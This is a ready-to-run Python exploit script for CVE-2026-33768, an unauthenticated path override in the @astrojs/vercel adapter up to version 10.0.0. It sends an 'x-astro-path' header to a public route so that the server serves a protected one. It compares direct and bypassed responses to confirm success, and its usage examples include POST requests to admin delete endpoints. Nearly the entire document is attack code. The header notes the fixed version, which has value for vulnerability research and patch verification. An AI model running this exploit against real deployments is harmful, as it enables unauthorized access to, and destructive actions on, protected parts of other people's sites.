#!/usr/bin/env python3
# Exploit Title: @astrojs/vercel <= 10.0.0 - Unauthenticated x-astro-path Header Path Override
# CVE: CVE-2026-33768
# Date: 2026-03-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://astro.build
# Software Link: https://github.com/withastro/astro
# Affected: @astrojs/vercel <= 10.0.0
# Tested on: @astrojs/vercel 10.0.0
# Category: WebApps
# Platform: Vercel Serverless
# Exploit Type: Path Override / Bypass
# CVSS: 7.5 (High)
# Description: Unauthenticated path override via x-astro-path or x_astro_path header/query parameter in Astro Vercel adapter.
# Fixed in: @astrojs/vercel 10.0.2
# Usage:
# python3 exploit.py <base_url> <target_path> [original_path] [method] [json_data]
#
# Examples:
# python3 exploit.py https://example.vercel.app /admin/secret
# python3 exploit.py https://example.vercel.app /admin/delete /public POST '{"userId":123}'
#
# Notes:
# • Full professional exploit with protection check, response diff analysis,
# redirect detection, and support for cookies / custom headers
# • Compares direct access vs bypass to prove real success
# • Detects if redirected to login or reached protected content
import requests
import sys
import json
import difflib
from urllib.parse import urljoin
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
def get_response(base_url, path, headers=None, cookies=None, method="GET", data=None, allow_redirects=True):
full_url = urljoin(base_url.rstrip("/") + "/", path.lstrip("/"))
req_headers = {"User-Agent": "Mozilla/5.0 (compatible; CVE-2026-33768-PoC)"}
if headers:
req_headers.update(headers)
try:
if method.upper() == "GET":
r = requests.get(full_url, headers=req_headers, cookies=cookies, timeout=15, allow_redirects=allow_redirects)
else:
r = requests.request(method.upper(), full_url, headers=req_headers, cookies=cookies, json=data, timeout=15, allow_redirects=allow_redirects)
return r
except Exception as e:
print(f"Error requesting {path}: {e}")
return None
def analyze_redirect(response):
if response is None:
return "No response"
if response.is_redirect or (300 <= response.status_code < 400):
location = response.headers.get("Location", "Unknown")
return f"Redirected to: {location}"
return "No redirect"
def response_diff(direct_text, bypass_text):
if not direct_text or not bypass_text:
return "Cannot compare (one response is empty)"
diff = difflib.unified_diff(
direct_text.splitlines(keepends=True),
bypass_text.splitlines(keepends=True),
fromfile='Direct Access',
tofile='Bypass Access',
lineterm=''
)
diff_text = ''.join(diff)
if diff_text.strip():
print("\n[+] Content Difference Detected (Proof of Bypass):")
print(diff_text[:1200])
else:
print("\n[+] No major content difference (pages may be similar or identical)")
def exploit_astro_vercel(base_url, target_path, original_path="/public", method="GET", data=None, cookies=None, extra_headers=None):
print(f"[+] Target URL : {base_url}")
print(f"[+] Original Path : {original_path}")
print(f"[+] Target Path : {target_path}")
print(f"[+] Method : {method}\n")
# Step 1: Direct access (to check protection)
print("[+] 1. Testing direct access to protected path...")
direct_resp = get_response(base_url, target_path, cookies=cookies, method=method, data=data)
if direct_resp:
print(f" Status: {direct_resp.status_code}")
print(f" Redirect: {analyze_redirect(direct_resp)}")
direct_text = direct_resp.text
else:
direct_text = ""
# Step 2: Bypass attempt
print("\n[+] 2. Attempting path override bypass...")
bypass_headers = {"x-astro-path": target_path}
if extra_headers:
bypass_headers.update(extra_headers)
bypass_resp = get_response(
base_url,
original_path,
headers=bypass_headers,
cookies=cookies,
method=method,
data=data
)
if bypass_resp:
print(f" Bypass Status: {bypass_resp.status_code}")
print(f" Redirect: {analyze_redirect(bypass_resp)}")
bypass_text = bypass_resp.text
else:
bypass_text = ""
# Step 3: Analysis
print("\n" + "="*70)
print("ANALYSIS & PROOF")
print("="*70)
if bypass_resp and bypass_resp.status_code in (200, 201, 204):
print("SUCCESS: Bypass returned successful status code!")
if "login" in bypass_resp.text.lower() or "auth" in bypass_resp.text.lower():
print("WARNING: Response contains login/auth keywords - may still be blocked")
else:
print("Strong indication that protected content was reached!")
response_diff(direct_text, bypass_text)
else:
print("Bypass did not return success status.")
if bypass_resp:
print("\n[+] First 800 characters of bypass response:")
print(bypass_resp.text[:800])
if __name__ == "__main__":
banner()
if len(sys.argv) < 3:
print("Usage: python3 exploit.py <base_url> <target_path> [original_path] [method]")
print("Example:")
print(" python3 exploit.py https://target.vercel.app /admin/dashboard")
print(" python3 exploit.py https://target.vercel.app /admin/delete /api/health POST")
sys.exit(1)
base_url = sys.argv[1]
target_path = sys.argv[2]
original_path = sys.argv[3] if len(sys.argv) > 3 else "/public"
method = sys.argv[4] if len(sys.argv) > 4 else "GET"
data = None
if len(sys.argv) > 5 and method.upper() != "GET":
try:
data = json.loads(sys.argv[5])
except:
data = {"test": "data"}
cookies = None # Add cookies here if needed (dict)
extra_headers = None # Add extra headers here if needed (dict)
exploit_astro_vercel(base_url, target_path, original_path, method, data, cookies, extra_headers)
